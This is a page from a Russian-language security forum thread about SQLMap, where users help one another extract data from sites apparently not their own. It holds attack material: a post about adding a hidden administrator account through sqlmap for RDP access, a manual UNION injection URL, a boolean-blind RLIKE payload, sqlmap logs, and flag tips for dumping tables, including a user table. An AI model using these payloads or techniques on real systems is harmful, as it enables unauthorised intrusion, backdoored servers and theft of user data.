HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Вопросы по SQLMap
   
Ответ
Страница 59 из 115 « Первая < 949 55 56 57 58 59 60 61 62 63 69109 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #581  
Старый 14.01.2018, 02:53
Sensoft
Guest
Сообщений: n/a
Провел на форуме:
104689

Репутация: 1
По умолчанию
Цитата:
Сообщение от Siriak  
Siriak said:

Все оказалась проще некуда, если у тебя права True
Через sqlmap прописал нового пользователя RDP командами
net user Admin Pass /add
net localgroup administrators Admin /add
и ты типа можешь на сервер зайти ?
 
Ответить с цитированием

  #582  
Старый 14.01.2018, 02:59
Siriak
Guest
Сообщений: n/a
Провел на форуме:
54759

Репутация: 5
По умолчанию
Цитата:
Сообщение от Sensoft  
Sensoft said:

и ты типа можешь на сервер зайти ?
Конечно
 
Ответить с цитированием

  #583  
Старый 15.01.2018, 15:18
ApTemkA
Guest
Сообщений: n/a
Провел на форуме:
236

Репутация: 0
По умолчанию
Получил данную уязвимость



там оказалась одна БД, не считая information_schema, получил таблицы, с первой таблицы сделал дамп, всё ок, пробую другие и везде одно и то же:

Код:
Code:
[15:13:21] [WARNING] something went wrong with full UNION technique (could be because of limitation on retrieved number of entries). Falling back to partial UNION technique
[15:13:22] [WARNING] unable to retrieve the entries of columns 'name' for table 'Test' in database 'm12540_pc'
 
Ответить с цитированием

  #584  
Старый 16.01.2018, 03:55
ShpillyWilly
Guest
Сообщений: n/a
Провел на форуме:
27718

Репутация: 0
По умолчанию
как такое может быть, что руками работает самый примитивный запрос

Код HTML:
HTML:
site.com/view.php?cid=1+union+select+1,2,3,4,5,6
, a sqlmap не видит в упор, даже если я ему подсовываю тип базы, кол-во столбиков для Union и левелриски? Подскажите, есть ли мысли..
 
Ответить с цитированием

  #585  
Старый 16.01.2018, 04:14
erwerr2321
Guest
Сообщений: n/a
Провел на форуме:
759330

Репутация: 147
По умолчанию
--headers="X-Requested-With: XMLHttpRequest" не?
 
Ответить с цитированием

  #586  
Старый 16.01.2018, 12:06
ShpillyWilly
Guest
Сообщений: n/a
Провел на форуме:
27718

Репутация: 0
По умолчанию
Цитата:
Сообщение от ms13  
ms13 said:

--headers="X-Requested-With: XMLHttpRequest" не?
Спасибо за предложение, но, что бы оно ни значило, результата это не дало, к сожалению.
 
Ответить с цитированием

  #587  
Старый 16.01.2018, 13:20
erwerr2321
Guest
Сообщений: n/a
Провел на форуме:
759330

Репутация: 147
По умолчанию
Цитата:
Сообщение от ShpillyWilly  
ShpillyWilly said:

Спасибо за предложение, но, что бы оно ни значило, результата это не дало, к сожалению.
всё успешно отработало с данными параметрами

--random-agent --dbms=mysql --technique=u
 
Ответить с цитированием

  #588  
Старый 17.01.2018, 12:00
Sensoft
Guest
Сообщений: n/a
Провел на форуме:
104689

Репутация: 1
По умолчанию
В чём проблема не выводит BD

Код:
Code:
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: address (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: address=if' RLIKE (SELECT (CASE WHEN (1726=1726) THEN 0x6966 ELSE 0x28 END)) AND 'yDAP'='yDAP
---
[10:58:47] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[10:58:47] [INFO] testing MySQL
[10:58:47] [INFO] confirming MySQL
[10:58:47] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 7.1.11
back-end DBMS: MySQL >= 5.0.0
[10:58:47] [INFO] fetching database names
[10:58:47] [INFO] fetching number of databases
[10:58:47] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[10:58:47] [INFO] retrieved:
[10:58:48] [WARNING] unexpected HTTP code '404' detected. Will use (extra) validation step in similar cases

[10:58:48] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[10:58:48] [ERROR] unable to retrieve the number of databases
[10:58:48] [INFO] falling back to current database
[10:58:48] [INFO] fetching current database
[10:58:48] [INFO] retrieved:
[10:58:49] [CRITICAL] unable to retrieve the database names
[10:58:49] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 6 times
 
Ответить с цитированием

  #589  
Старый 17.01.2018, 14:20
erwerr2321
Guest
Сообщений: n/a
Провел на форуме:
759330

Репутация: 147
По умолчанию
Цитата:
Сообщение от Sensoft  
Sensoft said:

В чём проблема не выводит BD
Вообще

[WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'


как бы намекает...

В твоём случае --no-cast
 
Ответить с цитированием

  #590  
Старый 18.01.2018, 15:50
akv84
Guest
Сообщений: n/a
Провел на форуме:
596

Репутация: 0
По умолчанию
Добрый день,

Не могу получить дамп к нужной таблицы в SQLite:

команда: sqlmap -r request.txt -p Param --dbms=sqlite --force-ssl -D SQLite_db -T USERDB --dump

На выходе получаем:

[INFO] retrieved: CREATE TABLE USERDB ( OID

[WARNING] unable to enumerate the columns for table 'USERDB' in database 'SQLite_db'

Некоторые таблицы получаю без проблем в этой же базе.
 
Ответить с цитированием
Ответ
Страница 59 из 115 « Первая < 949 55 56 57 58 59 60 61 62 63 69109 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ